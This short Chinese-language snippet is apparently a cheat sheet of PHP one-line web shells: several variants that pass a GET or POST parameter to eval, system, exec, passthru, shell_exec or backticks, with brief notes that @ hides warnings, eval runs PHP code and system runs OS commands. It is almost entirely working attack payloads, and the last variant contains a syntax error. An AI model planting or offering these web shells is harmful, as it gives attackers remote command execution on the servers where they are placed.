@ + function表示忽略警告。 eval() 是可以執行php代碼 system() 是可以執行系統命令 ...
<?php @eval($_GET['phpcode']);?>
<?php @eval($_POST['phpcode']);?>
<?php @system($_GET['cmd']);?>
<?php @system($_POST['cmd']);?>
<?php @exec($_POST['cmd']);?>
<?php @passthru($_POST['cmd']);?>
<?php @shell_exec($_POST['cmd']);?>
<?php $cmd=$_POST['cmd']);`$cmd`;?>
@ + function表示忽略警告。
eval() 是可以執行php代碼
system() 是可以執行系統命令